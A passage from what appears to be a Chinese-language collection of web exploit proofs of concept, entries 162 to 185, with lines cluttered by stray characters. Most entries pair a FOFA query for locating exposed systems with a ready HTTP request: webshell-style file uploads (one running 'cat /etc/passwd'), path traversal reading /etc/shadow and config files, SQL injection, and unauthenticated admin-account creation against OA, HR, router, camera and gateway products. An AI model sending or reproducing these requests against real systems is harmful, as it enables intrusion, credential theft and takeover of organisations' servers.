: f$ }* G% z2 F+ |+ A: t- U<UploadResume xmlns="http://tempuri.org/">, \! n3 x2 T1 u( U' a
<ip>1</ip>
' ]- E" ?2 F! c4 k6 Y- d; |, l<fileName>../../../../dizxdell.aspx</fileName>
- T4 R' P6 z: j% D, A0 ^<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
) q# q9 o- b ~5 J; f<tag>3</tag>1 {- d; k2 e& \( ]" k( U1 g" ]
</UploadResume>
) y7 h) m: L' y</soap:Body>: n9 g; O) m; |& y7 y! B
</soap:Envelope>
* Y7 b: _2 f6 A$ {5 w1 _1 ]3 A2 m
; Y0 `2 ?- F2 X2 F% ?" E' F# W2 c, n/ O2 I6 G! X/ k
http://x.x.x.x/dizxdell.aspx
9 V v; t* R! m1 W" Z+ |, P0 T* u2 X1 k7 M" f' t0 `1 r$ m k5 R7 u
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传6 C3 O! C3 D. G6 ]9 [
FOFA: app="和丰山海-数字标牌"; i$ _9 D8 {1 {" f) O' ~3 z
POST /QH.aspx HTTP/1.1# V4 `) m- U4 f
Host: x.x.x.x
( g& |: P8 `: f# e/ V/ e* AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0+ O" I# M8 j2 s4 z- \& {4 t7 k
Connection: close
; E2 d3 N9 d( R! ~6 QContent-Length: 583 u6 h/ j z2 h+ c% t1 @. H% g d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey2 p! a+ h, {( |; ] X: H
Accept-Encoding: gzip
- Y: Q# l9 d+ V' Z! M' h2 }& i v/ b( O
------WebKitFormBoundaryeegvclmyurlotuey% Q! \+ I" K! ?$ Y& O
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
3 H- d8 C- a" EContent-Type: application/octet-stream
. \8 ?6 R# p! `( H
7 g9 V/ r- y1 D5 x! k- ]: E<% response.write("ujidwqfuuqjalgkvrpqy") %>. k/ o: r/ U$ J8 B% k, J2 i5 ]
------WebKitFormBoundaryeegvclmyurlotuey
! {0 r# ?8 T1 N$ U; M; KContent-Disposition: form-data; name="action"+ `! P. ?7 J, T6 r
% c1 g# m, K9 r2 x- g0 {% t8 \upload
9 a$ n8 D4 B4 Y5 A9 i/ D" f4 f------WebKitFormBoundaryeegvclmyurlotuey+ R; ~( C" c7 k4 h
Content-Disposition: form-data; name="responderId"4 t( [ T% Y5 o7 c
3 s6 p$ X" M4 x& `
ResourceNewResponder
! R5 a* q4 G1 b5 H; b------WebKitFormBoundaryeegvclmyurlotuey
# y5 u: \0 ^0 nContent-Disposition: form-data; name="remotePath"7 ] o$ {! O* T2 ~3 d
8 M }7 F. i1 h X/ o( \# l1 {/opt/resources
: n$ x% Q! ]+ C, D1 H |" w) x% r------WebKitFormBoundaryeegvclmyurlotuey--. }4 Z8 u$ P! K1 S5 W
' l7 z! d, j7 _
. b# @( e G, g& i2 m
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
- }0 P3 t# u8 q: @1 E$ P; y( }' W- W9 e2 s/ ]2 v
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 r" B ^7 F! D @3 t) @: `4 h( {3 W2 _
FOFA: icon_hash="-795291075"4 Y. a; W* S; h& a f! u3 T) A6 ~
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.10 c' v7 b0 I& S. f8 H
Host: x.x.x.x% _$ r' W! @1 }" g, x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) L7 F1 B( c) N7 d8 Y6 v
Connection: close
( D* F" j1 D9 t% \' |$ r' f7 WContent-Length: 293
) r7 `; Z" ]; C; ^( r: B* wAccept: */*# I v3 l( T6 W& I; T5 m" R# E
Accept-Encoding: gzip, deflate
, j! O1 i: ~2 JAccept-Language: zh-CN,zh;q=0.9 y9 a5 T7 d3 ~4 z9 X5 L9 d
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod9 s+ q% i+ I$ z% h* p, S* A1 ?
9 v: |1 E; D1 s( S, I3 t7 j
------iiqvnofupvhdyrcoqyuujyetjvqgocod; R3 a* u# b5 R$ l5 {
Content-Disposition: form-data; name="name"* }# X) V7 D6 z& ^5 {" F" R+ H. R
! G& A ^. X. g4 D2 D, ]
1.php
7 W# t2 b, e$ o! J1 b2 t) ?7 V! k------iiqvnofupvhdyrcoqyuujyetjvqgocod2 V+ z% j: \5 ~, N, \; O5 E W- |
Content-Disposition: form-data; name="upfile"; filename="1.php"
8 D$ ^! o* R* L3 j4 Z! K6 p& x# DContent-Type: image/jpeg7 |$ l7 h/ y3 ?2 e& I4 E
6 T. R' i7 t: C6 Ervjhvbhwwuooyiioxega
) }9 C ^2 N4 x2 F# b% v------iiqvnofupvhdyrcoqyuujyetjvqgocod--: S* B F2 A& D! i5 W
% B" }0 n1 H, |, i5 ]& x+ v0 b7 c
5 l ?9 p0 U1 m164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
6 Z' H; O1 l, \FOFA: title="智慧综合管理平台登入"
4 j/ S; V6 i/ ]$ q- aPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1# _3 y4 [- n u" |2 @
Host: x.x.x.x
% H4 H( k. r F/ R3 a \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
* ?- k/ E5 L. Z. j' n$ tContent-Length: 288+ w5 F( |+ U" w7 c3 V+ |
Accept: application/json, text/javascript, */*; q=0.01/ {* ^( X0 e/ R3 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,3 L1 l& G/ ]1 @ b. k
Connection: close; S3 f% Y/ [" H; W' X! ?9 s
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl3 I- x0 s. Y# J& b
X-Requested-With: XMLHttpRequest8 a, P. z" ?) Y+ }, \9 a
Accept-Encoding: gzip) |. G# d, F! M
5 U- f( ?% A) M- l9 Q6 K! y
------dqdaieopnozbkapjacdbdthlvtlyl4 C6 b- Z; ` C$ M( W
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
! ?! o& w! ]! LContent-Type: image/jpeg4 [6 g5 `5 V1 H. h
$ l9 i" i% E' q) S# Z
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
1 @. b3 ?# C8 @% c, `4 S------dqdaieopnozbkapjacdbdthlvtlyl--5 i; a/ s% I- m- p
& x0 w- h( N" Y) C4 S$ q# y1 d3 [
# r4 i9 I! u; fhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
1 i( H4 a/ t4 u+ V/ `* a- m# D* k) n; O j( Q7 h0 E: O5 l) c7 e3 t
165. OrangeHRM 3.3.3 SQL 注入
: {% I2 x+ N [3 yCVE-2024-364282 p2 H3 v! `: ^
FOFA: app="OrangeHRM-产品"% d7 u% f6 ~- u) M
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))9 O& D# b" `- J& C/ z0 y
% w; a8 n1 {% e/ p
& s4 ]& }* C% [$ q# M& z
166. 中成科信票务管理平台SeatMapHandler SQL注入+ i9 O% m# W: z8 |
FOFA:body="技术支持:北京中成科信科技发展有限公司"
! B& F; H8 X3 l1 a7 J5 ~" s+ GPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
1 _+ c+ Q0 C/ r9 E2 i& o* r% XHost:
8 d" Q% l! Y# h4 ^6 uPragma: no-cache/ o6 [/ }$ E) z1 }% d
Cache-Control: no-cache8 B! \6 Y! ~7 C8 S; m t
Upgrade-Insecure-Requests: 1
1 k- o% m7 n( j- L) Y1 E# ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 _/ p i$ n% b9 V4 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ y/ p: e) q5 j* e' pAccept-Encoding: gzip, deflate9 G# }5 L% T- z2 X# G0 T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 W& ]( l+ p0 N/ v4 S+ RCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE f9 t- H/ K; W) l! H- D
Connection: close
8 x2 k% a" n# JContent-Type: application/x-www-form-urlencoded
, ]# }) U% y$ {; u$ Y" TContent-Length: 89- x" f9 h0 n; |# S4 F5 X
$ w0 ^% z' x* b& K! L
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE/ a( q4 J2 B) j$ N5 N
* k$ G& }+ @' {5 Q7 E4 I5 z
$ W, [$ t. q( s8 g* l4 o2 W167. 精益价值管理系统 DownLoad.aspx任意文件读取
' n0 c+ H0 C9 B; x* N' Q6 tFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
8 h: K: m0 h' |% B2 JGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
9 |' s7 D4 G3 Q8 {- p* zHost:: _' s& i; O" Q% [* P+ p+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 F; \3 l1 B& [: c2 \* M' j$ TContent-Type: application/x-www-form-urlencoded
$ P5 v3 B8 q' r. B& C, jAccept-Encoding: gzip, deflate
9 s6 a3 w# w: E! g [% B7 TAccept: */*7 V. N$ f7 v' M, N
Connection: keep-alive# Q; s( o7 h! {5 y' Z8 `0 E" ~" D
* P6 h, Y- N4 K* G: F7 b3 w
4 w7 a( t1 z/ t3 B$ V168. 宏景EHR OutputCode 任意文件读取5 s% z) z8 \2 Y: z# I; g5 Z j( s
FOFA:app="HJSOFT-HCM": E( N: w, S6 @# \
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
7 w w0 L; ~! ?, w( n& yHost: your-ip- u0 ]& T1 {0 y- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
/ o% r8 n b5 @' R4 zContent-Type: application/x-www-form-urlencoded
9 q5 T) v G! jConnection: close( @8 m: D6 Z$ T; }
7 a. U3 U. {& R- ?8 P9 \8 [
$ I* d0 O* ?- N! n; S/ D
+ a' X' J# K" w. ]$ L. q+ z# n7 a169. 宏景EHR downlawbase SQL注入
" n9 {' Z8 B$ c. Z! A4 X' M/ \FOFA:app="HJSOFT-HCM"( E# e' A4 ?7 E& t, J* j4 g& |
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
t' |; }! [2 L( zHost: your-ip4 s' _6 V4 ^# z% R1 A. {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: ]% W; A; L% o8 m/ x" @
Accept: */*9 Y& l' B1 D6 [% V( ~ N* G# u
Accept-Encoding: gzip, deflate
. M4 D+ e @/ CConnection: close
4 l. \8 ~- ^& T$ g+ ?1 j% J& I4 O, V9 O% i! G# V
) T% f; Z# o0 C
3 y: A/ Y" d: M1 d( t2 U$ o) e170. 宏景EHR DisplayExcelCustomReport 任意文件读取, Q$ n `. a2 |4 f
FOFA:body="/general/sys/hjaxmanage.js"
8 i# t% s1 d2 I i. R Q" kPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 @5 J( b: G( i( d' Y9 d( J4 J
Host: balalanengliang& s b# W" g F- X- p" ^7 E5 Q+ Z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. a+ Q" y* u: H& W. w1 `" SContent-Type: application/x-www-form-urlencoded1 }$ ]' _: {; w* U9 S- p2 N
6 L3 y; M9 g r& z' V/ w9 W
filename=../webapps/ROOT/WEB-INF/web.xml
* D |- ~. n0 \" ]; t+ E p: \
w0 s2 P e% C! ~
" i% T0 \! V9 |4 o* \, | V& W8 i171. 通天星CMSV6车载定位监控平台 SQL注入
' N+ A7 K- `- G; p$ D4 V9 M0 kFOFA:body="/808gps/"# x, I/ V# f9 x2 K
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
( J7 F- U- \& T: xHost: your-ip: K( C# a6 u3 t0 q% X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
+ ~) K1 g, g' J! r% ]Accept: */*
6 ]2 ]: u" C% d3 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; g f# J3 P0 L# U0 A4 U
Accept-Encoding: gzip, deflate
7 c8 w+ A, q' cConnection: close5 s0 |& q- P* I, ^5 A; }
; C1 ?5 y$ O1 l4 f& s I
" h# e2 f7 A7 B, I1 U; H/ r8 [/ M9 q/ Y x: K5 W3 A
172. DT-高清车牌识别摄像机任意文件读取
9 N3 ^! P1 Y4 LFOFA:app="DT-高清车牌识别摄像机"; N$ {2 R* S' {. U( K
GET /../../../../etc/passwd HTTP/1.1( a! R5 U# Z, P/ [7 d2 l8 j O
Host: your-ip
' j; m5 T/ F; y, _% FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; l+ F* U- c+ I$ L! h" lAccept-Encoding: gzip, deflate
; U( s4 s( ~1 D+ k/ W; @; S5 ?Accept: */*
B( H" C# i4 h: g5 e% |Connection: keep-alive
, d4 J/ r$ A8 \# F3 t: L; M/ n) @( ?- }. q$ ?3 l' b
0 | `9 k8 t( m
0 U2 L2 o+ ~( f [3 R# Q) c173. Check Point 安全网关任意文件读取
6 u9 h8 @& i o# Y" s1 Z8 LCVE-2024-24919 t6 B4 _4 g# G3 C2 @
FOFA:app="Check_Point-SSL-Network-Extender"
; _+ d- u% [( `& ?: L1 ~POST /clients/MyCRL HTTP/1.10 C' @' v; c, p" x R
Host: your-ip
) _/ `! X; |6 x, S4 w$ K0 T2 }Content-Type: application/x-www-form-urlencoded4 x$ r/ M2 a% s* v
2 o2 B9 z. v& f/ U* \- ]
aCSHELL/../../../../../../../etc/shadow
% k1 A/ y! m( W4 S5 f4 E- Q/ \; i; z1 `- i& x
9 e$ S3 B7 ~) W' {) c7 m3 N& E; X6 V$ x4 _+ a+ l3 t# m
174. 金和OA C6 FileDownLoad.aspx 任意文件读取+ }$ \* k5 g' c* ?; Q% G, e5 P1 E
FOFA:app="金和网络-金和OA"0 u" J! Q; d5 m
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1# R0 C% I+ v9 R* x: Y
Host: your-ip4 m8 ?3 ]- k. K2 L9 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* |6 k, y) O: r& F% {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ x! v+ p& W0 o9 f! o5 N7 C" `# ^
Accept-Encoding: gzip, deflate, br9 X% p" A" \9 c/ t* S8 B6 \
Accept-Language: zh-CN,zh;q=0.9
2 b0 w' h, R; j& T& h8 pConnection: close
; W5 t( T2 |+ u) O: {$ Q
$ j; j, H$ q3 V+ H% k
) f6 ]& _ D4 Q0 L3 M3 W
f5 ]* V; j! T( y* C0 v5 j: I175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
/ I% |7 z6 n, x8 K4 b- {6 w3 ZFOFA:app="金和网络-金和OA"4 W+ r% Y! c- q
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1" \$ K( M3 H' o. y: w' J
Host:" [6 w1 r# D! s* Y" Y, d( V0 ^, ?) y
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 X" P% x! v" H& T' wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' A; j# d0 c2 j* c; f* q5 I% nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 F; p- ?" @, ]- k0 L c
Accept-Encoding: gzip, deflate/ H6 e% C5 h6 U
Connection: close7 D* h! d* f- O
Upgrade-Insecure-Requests: 1+ D1 q* a3 m# J5 u( C6 R
5 g3 E9 U3 h* V3 L$ M* [
* X3 {+ w9 d% Y0 j$ J176. 电信网关配置管理系统 rewrite.php 文件上传& G: Y) m* \2 m( P2 r
FOFA:body="img/login_bg3.png" && body="系统登录"
( D/ d9 D6 }8 a+ w9 ^POST /manager/teletext/material/rewrite.php HTTP/1.12 }" M, O8 X3 E+ s, |$ q0 E# x; l
Host: your-ip: ?0 P& I% a6 ]8 M; \+ x2 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ V; {- [$ d+ [7 I. c, h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT8 u0 F& t" k) e0 T; s I6 B
Connection: close2 q8 g" e& ]4 Z) J0 Y
4 s* T3 ~* F4 H------WebKitFormBoundaryOKldnDPT; L3 y% z- w/ [8 u, p9 V/ E' v
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
2 X0 b2 s6 s* F& ]Content-Type: image/png0 c( \$ q* ?$ r+ F5 I
; M" ?: Y" k4 p. S$ {1 A# b. t
<?php system("cat /etc/passwd");unlink(__FILE__);?>. ~2 ]! X5 l; H* b+ K S
------WebKitFormBoundaryOKldnDPT
' x6 d. D0 h9 N& Z" g6 Y: CContent-Disposition: form-data; name="uploadtime"8 m* r& F% s/ K
9 @3 Q" Y' k0 h' C1 o7 S/ e
+ c( B; c# h6 i2 k1 |
------WebKitFormBoundaryOKldnDPT--) Z0 x: |' T) ]! q
' u. A. K: B O0 ~3 s4 P# [5 P$ R8 ]0 a2 V1 m& p
: ~: h+ g' v8 P; Y& q1 E! T
177. H3C路由器敏感信息泄露
9 u0 C! |0 b1 ^3 F; R/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg% a' @: r! P( J$ d( M1 O0 ]2 ~
/userLogin.asp/../actionpolicy_status/../M60.cfg
- ?1 X. o- k4 }1 ]; ^/userLogin.asp/../actionpolicy_status/../GR8300.cfg- }: v. i7 u* z. O8 _8 y/ p7 n3 ~, z
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
( \3 S5 n: l/ E# C/userLogin.asp/../actionpolicy_status/../GR3200.cfg& C, f. C, J5 o8 x' o
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
- |! E1 U4 _" U+ f9 k* E( @3 b& d/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg {* p5 M- X, j; D$ N7 r% u
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
0 n6 R4 i7 y) z7 L7 g/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg7 m3 G& f) c4 L2 T
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg1 v# N. M. _- p
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
F9 J% s H! F# X# Q \/userLogin.asp/../actionpolicy_status/../ER5100.cfg
$ b/ [. r9 q2 q* Z s/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
s3 X, i; n1 W: V3 \/ ?/userLogin.asp/../actionpolicy_status/../ER3260.cfg
I- Z. x" S0 E6 y$ |/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
4 U4 O; O& [. Y0 V- p7 Z& @/userLogin.asp/../actionpolicy_status/../ER3200.cfg& W' @$ O: ?, c' m
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg1 I# R/ @+ b* Q3 t1 O. a
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg, @) ~4 s* H7 @5 S9 G
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
0 u# o( Z$ h; A, P4 j( A/userLogin.asp/../actionpolicy_status/../ER3100.cfg. d% V* a9 N( \5 [$ u" i
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg: j. T4 B5 t) E" P' w: K; c$ A
5 |5 e2 j( S- I6 t q
9 t( d, J. ]; w5 c178. H3C校园网自助服务系统-flexfileupload-任意文件上传) ?. L: ^2 ]; P) ]
FOFA:header="/selfservice"' F4 S X) ?& I$ A/ c. a
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.13 d; b& q; V4 j
Host:" a3 e. y0 V1 j& O. [, C r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 a, X' v9 [; ]! X3 ~# rContent-Length: 252
! \ t, D) C# _8 VAccept-Encoding: gzip, deflate# a, C5 i* t; y- Z$ T4 Q
Connection: close
) y: o9 Q) w2 d% j/ J& ]Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
K, k: U$ ]. ~: B' e-----------------aqutkea7vvanpqy3rh2l
# @. g; {' h7 \3 u3 AContent-Disposition: form-data; name="12234.txt"; filename="12234"
) l' i! M5 ~* z: ZContent-Type: application/octet-stream
% s/ ?; R) e9 r2 x8 c: j* M7 BContent-Length: 2551 Z* y' l$ r6 s: m& ]$ d% T1 U, U
4 @' \ G* s! c" }$ U& w12234
" G, j! X K" U0 t) x$ ~% S9 B-----------------aqutkea7vvanpqy3rh2l--
: T- C1 x6 I( B: |& e5 A4 I1 c7 _' G6 V) m
' p7 e t {+ WGET /imc/primepush/%2e%2e/flex/12234.txt; `7 ?) J5 r: G# j! j
+ x* i2 `0 Y$ M3 H
, E1 [, v/ X0 y- E179. 建文工程管理系统存在任意文件读取
( W( _6 G# r& Z& ]POST /Common/DownLoad2.aspx HTTP/1.1) P/ A9 q) }$ s. T( C
Host: {{Hostname}}; B# I$ _7 [: G1 p
Content-Type: application/x-www-form-urlencoded
" o1 h7 Y' P+ r0 E0 YUser-Agent: Mozilla/5.0% y1 J S# L: t: t0 S
b) b5 n8 @1 Q" H# S7 F4 p. `7 O
path=../log4net.config&Name=3 _% S( ~/ e0 l7 C9 ~
3 j9 F8 W' U$ ?8 {7 @% v. i
X0 g& W) E2 a- v. o1 l
180. 帮管客 CRM jiliyu SQL注入
% T0 k6 s. A* _% WFOFA:app="帮管客-CRM"' g, @) B" P% a& a3 B! ~$ j
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.14 Y+ G4 Q; g" M7 K: S% D* k3 }% ~
Host: your-ip
' o9 ?: y! d& D& X. e7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, I4 _8 n0 O& K! T& J# C/ i$ nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 |% q C) }1 `8 `8 lAccept-Encoding: gzip, deflate* X0 F% q' f7 n9 a7 S* x4 ^
Accept-Language: zh-CN,zh;q=0.9
% ? ^& U4 z7 ~3 xConnection: close
7 g$ ?( j/ n- k# d6 ]- N: U
- o l" q% @: `3 H: J# o# ~! K% d5 \& w, p) y
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
7 ~/ k" L4 r2 A5 g( N& \, QFOFA:"PDCA/js/_publicCom.js"$ j" J s9 p- R6 v4 U
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1% f& q. u1 T/ ]! l _
Host: your-ip% t3 \1 ~& P1 h6 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" u/ b5 H/ ?" c( Z9 Z% J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, U7 |3 o j6 I4 r! v2 iAccept-Encoding: gzip, deflate, br
+ w6 D4 d5 M9 i7 ~% CAccept-Language: zh-CN,zh;q=0.9$ z$ p0 v, K1 l
Connection: close0 G! H: F& O# H3 M! ?; X
Content-Type: application/x-www-form-urlencoded
5 `: q! o6 X s" T3 t( [1 m* j& U- @+ I
* n5 U7 Q% j- [4 V6 q
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20- o+ _ q4 S# c A+ V( ]0 c
# O: `' `6 P, Z/ q
! `# s9 d# `5 n+ K0 y
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 r+ X2 A3 ~: `3 u3 b9 j
FOFA:"PDCA/js/_publicCom.js"5 }' e4 [) \/ x f4 {, a- X. Q$ p
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1) L/ c0 W' @! w3 }1 a8 j! E
Host: your-ip
$ Y, C/ |4 b: ]0 Y/ D9 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 w9 Q3 Y3 Q9 y! |/ }5 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' Z& q8 z, [8 s: \Accept-Encoding: gzip, deflate, br
- D: a4 T2 j+ o# l' V. A$ MAccept-Language: zh-CN,zh;q=0.9
/ }! J* C* S7 V/ [Connection: close U' H! u! [! ?: {
Content-Type: application/x-www-form-urlencoded
0 l0 F. _/ `# N Y6 x1 t' t
# |2 m* R: x3 i# b. s( M+ J2 o2 \6 T" I) [2 G) R8 e
username=test1234&pwd=test1234&savedays=1
+ C0 p$ Y6 Z& K( I% n6 c8 C) C) T/ f6 _4 |
( u. y! s- O9 K% ?# Z, L9 J183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入5 r# q8 G/ _# ?' ?( H
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"" C, k% g5 q. [3 R' t7 a" k
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
: [5 @3 u% \5 u; G' R( R* BHost: your-ip, F. h. }1 u! O4 Z- K# Q: O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 l9 W- L1 X, E; z `. L
Accept-Charset: utf-8# y' F8 |* A) |: j/ {8 h
Accept-Encoding: gzip, deflate5 j+ s# h2 ^& M) D. ]* w
Connection: close
/ ~9 H0 }! X6 `7 ~
" J2 C) C) D/ ?4 D1 K+ E" {1 a8 s- L* t- m& ~
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加' j/ i% T3 ?+ e6 F0 \8 \) T
FOFA:server="SunFull-Webs"
0 a( y0 a, F( a" tPOST /soap/AddUser HTTP/1.1
4 E+ l+ A9 C" z w, _) v8 JHost: your-ip
4 E: z$ m! D( _' r) h+ ^- Q* iAccept-Encoding: gzip, deflate
5 C' h }' \( D5 ?0 a' s EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0! v5 q. [( ^8 e, ^% H2 c& N
Accept: application/xml, text/xml, */*; q=0.01
- |5 y0 n$ W5 u* C- ~3 XContent-Type: text/xml; charset=utf-8
+ ]( w. t$ G" `$ oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 J7 l( W0 U l* b4 ~
X-Requested-With: XMLHttpRequest. N- T3 y; |: F l- A, i+ N ]9 j, P2 I
# ?0 i/ b5 H& Z( E1 G& K
4 ?. b; B) R, c8 X' \. o
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')( I' t& y/ M# ?/ M; y2 R
- c4 f( Q1 N0 x7 h% p2 h8 p: Y8 n2 w- G3 Z f3 ~3 `8 r
185. 瑞友天翼应用虚拟化系统SQL注入
